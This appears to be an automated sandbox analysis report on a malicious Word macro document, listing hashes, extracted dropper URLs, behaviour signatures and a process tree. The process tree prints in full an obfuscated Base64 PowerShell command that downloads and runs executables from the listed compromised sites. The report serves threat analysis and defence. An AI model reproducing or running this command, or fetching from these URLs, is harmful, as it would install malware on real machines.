Analysis

  • max time kernel
    100s
  • max time network
    72s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 23:24

General

  • Target

    e3467e09f74aed3c66b9966cee1c36b1ed161bc93782c48e98514ff3122f6564.doc

  • Size

    228KB

  • MD5

    f2af036df754bb60cffc435f360ec913

  • SHA1

    23c42e1880d75f893da1050d8b96c749bf601c3e

  • SHA256

    e3467e09f74aed3c66b9966cee1c36b1ed161bc93782c48e98514ff3122f6564

  • SHA512

    b327d8b4bc181ba0c0d69c62bf5bab3eda6795d41785e55b0544f805487bdaf36b0796368e3ddc54d8e0917bb3ebe1f50d1838ede476b772f147ba8dbdefd372

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://dautudatnenhoalac.com/wp-admin/DYAsI/

exe.dropper

http://www.bewebpreneur.com/wp-admin/daHN/

exe.dropper

http://www.allgreennmb.com/wp-content/themes/pridezz/t9iV/

exe.dropper

http://www.baiduwanba.com/css/Ubh/

exe.dropper

http://rileyaanestad.com/wp-includes/DXn1R/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e3467e09f74aed3c66b9966cee1c36b1ed161bc93782c48e98514ff3122f6564.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e IAAoACAAbgBlAFcALQBvAGIAagBlAEMAdAAgACAAaQBPAC4AQwBvAE0AUABSAGUAUwBTAEkATwBOAC4AZABlAEYAbABBAHQAZQBzAFQAcgBFAGEAbQAoACAAWwBJAG8ALgBNAEUAbQBvAHIAeQBTAHQAcgBlAGEAbQBdAFsAcwB5AHMAdABlAE0ALgBDAE8ATgB2AGUAUgB0AF0AOgA6AGYAUgBPAE0AYgBBAFMAZQA2ADQAUwB0AHIASQBuAEcAKAAoACcAVgBaAEYAaABiADUAJwArACcAcwB3ACcAKwAnAEUASQBiAC8AaQBqACcAKwAnADgAZwAnACsAJwBPAFYARQBXAFAAQwBUADIAWQAnACsAJwBVAFYASQB2AFUAJwArACcARABYAFIAcABNACcAKwAnAHEAMABZADYATwAnACsAJwBvAFUAbQBUAE0AWgBmACcAKwAnAGcAQQBUAFkAJwArACcAQwBVADIAaQBpAC8AUABkADUAVgBSACcAKwAnAE0AcAAnACsAJwA5AC8AJwArACcASAAwADMAJwArACcAUAAnACsAJwB1ACcAKwAnACsAZAArAGYAbwAnACsAJwBlACcAKwAnAHYATABpACcAKwAnAEIAJwArACcARQBKADYAJwArACcAbAA0AG8AYwAnACsAJwBOAGgAcwBhAE8ASAAnACsAJwBkAHoAJwArACcANQAnACsAJwB1AHMAbwBEACcAKwAnAFIAVgBPAGEAMQAzACcAKwAnADgAUgBXAEgASQBJAHgAcgAzAEoAeABaAFIAJwArACcASQAxAEcAWgB3AE0AJwArACcAbQB5ACcAKwAnAEoAJwArACcATQBwACcAKwAnAGgAdABsACcAKwAnAE8AVgBNACcAKwAnAGQAMAAnACsAJwBOAFkAeQBVACcAKwAnAGYAegBWACcAKwAnAGgAeQAnACsAJwBvACcAKwAnADEAQgBWAG0AJwArACcAagBkACcAKwAnAGMAdQBFAEsAMwBiAE8AcgAnACsAJwBXACcAKwAnAHYARwAnACsAJwB5ACcAKwAnAGwAWQB2ACcAKwAnAEUAdgAnACsAJwBHAEwAYgBzACcAKwAnADkAZwBPACcAKwAnAGUAcABzAGsAdABjACcAKwAnAE0ASwBpADYAMQBIACcAKwAnAGgAMgBGACsAJwArACcAegBKACcAKwAnAFgAJwArACcAOQA0AHYARQBKADUAMAArAHgANwBSAEsAWABhADQAJwArACcAawB3ACcAKwAnAEsAcgBZACcAKwAnAHcATgB3AGsAJwArACcAeQAnACsAJwBGAEwAJwArACcAUQA2AHMANgAnACsAJwAyAFcASgBoAHcATQB6AFgAKwBYAEwAJwArACcAdABRAHUAWAA1AFQAaAAnACsAJwB4AFYAZgAnACsAJwBEADMAJwArACcAUwBUAEUAJwArACcATQBMACcAKwAnAEMAJwArACcAMgBxAEMAJwArACcAOQBMAEwAQgB0ADgANABWACcAKwAnAHoAZwBZAFgAcAA2ADEAcABSAEwATgBXAEYAJwArACcAcgBWAE8ARgAnACsAJwBQAGUARQAnACsAJwA2AFAAdQBjADkAZAAnACsAJwBJAHMANgBDACcAKwAnADMAZAAnACsAJwBCAGsANAB6AHcASQAnACsAJwBnAGcAUwAnACsAJwBnAFAANgBjAHMAJwArACcATQBIAG8AQwA5ADEAbwAnACsAJwA4AGsAeQBUAFgAYwBwAHkAUQBrADEAUAB0AGkARwB3AE4AcwAnACsAJwBBAEMARAAyAFEAbgBxAEkASQBIADkAbgBIAHMARAAvAEEAeABBADYAcQAnACsAJwBGADUAdgB4AGcASAAnACsAJwA3AHIAdABjADcAJwArACcANgA3ACcAKwAnADIAJwArACcAaQB2ACcAKwAnACsAJwArACcAbgBxAEkAcgBDAGkATABzACcAKwAnADUAJwArACcASQBnADUAMwAnACsAJwB1AGsAWQB0AHEANAAnACsAJwBkAGoAbQBuACcAKwAnAEMAWgBFACcAKwAnAEsAbgBJADUAKwBQAEoAbwAnACsAJwArACcAKwAnAHIAZgAnACsAJwBqACsAVQBOACcAKwAnAHUAcgBDACcAKwAnAGYAVgAnACsAJwBhAEYAJwArACcANQAnACsAJwArAHMAMgAnACsAJwBKACcAKwAnAG4ALwBoAFAANQBzAEwAJwArACcATgAnACsAJwB4AG4AMwAnACsAJwB3AEEAJwArACcAMwAzADYASgBRACcAKwAnAHgAMwAnACsAJwAvAEQANwBMAGQAawBjACcAKwAnAFgAaQBIAHMAJwArACcAMQA2AGEANwBDADkAYwBHACcAKwAnADYAJwArACcARABhAG0AOABxAHMAJwArACcAdAAnACsAJwA0AGoAOABUAC8AYgAnACsAJwBXAHAATABqAFYAcgAzAHEARwBxACsANAAnACsAJwB3ACcAKwAnAEUAbgA5AFoAJwArACcASgBNAEIAMgBPACcAKwAnADIALwBaADcASAAnACsAJwBOAG4ATgBDAGcAcwBGAG4AcgAnACsAJwA0AEgAJwArACcAUQAnACsAJwBTADMAJwArACcASQBqAHEAZQBEAG8AJwArACcANQBNAGsAOABnAEUAMQBsAEkAdAA1AEQAVwBmAGwAMQBiADEAMwA4AD0AJwApACkAIAAsACAAWwBpAE8ALgBDAG8ATQBwAFIAZQBTAHMAaQBvAE4ALgBjAG8AbQBwAFIAZQBzAHMAaQBPAG4AbQBPAEQARQBdADoAOgBEAEUAQwBPAE0AUAByAGUAcwBTACkAfAAlAHsAbgBlAFcALQBvAGIAagBlAEMAdAAgACAASQBPAC4AcwBUAFIAZQBBAE0AUgBlAGEAZABlAFIAKAAgACQAXwAsAFsAdABFAHgAVAAuAEUAbgBjAG8ARABpAE4AZwBdADoAOgBhAHMAQwBpAGkAKQB9AHwAJQAgAHsAIAAkAF8ALgBSAGUAQQBkAHQAbwBlAG4AZAAoACkAfQApAHwAJgAoACAAJAB2AEUAUgBiAG8AUwBFAFAAUgBlAGYARQBSAEUAbgBDAEUALgBUAG8AcwB0AHIAaQBOAEcAKAApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1720

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1636-60-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp
      Filesize

      8KB

    • memory/1636-58-0x0000000000000000-mapping.dmp
    • memory/1720-112-0x00000000024BB000-0x00000000024DA000-memory.dmp
      Filesize

      124KB

    • memory/1720-110-0x000007FEF3400000-0x000007FEF3F5D000-memory.dmp
      Filesize

      11.4MB

    • memory/1720-111-0x00000000024B4000-0x00000000024B7000-memory.dmp
      Filesize

      12KB

    • memory/1968-73-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-76-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-61-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-62-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-63-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-64-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-65-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-66-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-67-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-54-0x00000000724B1000-0x00000000724B4000-memory.dmp
      Filesize

      12KB

    • memory/1968-74-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-59-0x0000000070F1D000-0x0000000070F28000-memory.dmp
      Filesize

      44KB

    • memory/1968-75-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-77-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-78-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-79-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-85-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-91-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-97-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-103-0x0000000000595000-0x00000000005B6000-memory.dmp
      Filesize

      132KB

    • memory/1968-57-0x0000000075EF1000-0x0000000075EF3000-memory.dmp
      Filesize

      8KB

    • memory/1968-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1968-55-0x000000006FF31000-0x000000006FF33000-memory.dmp
      Filesize

      8KB

    • memory/1968-113-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB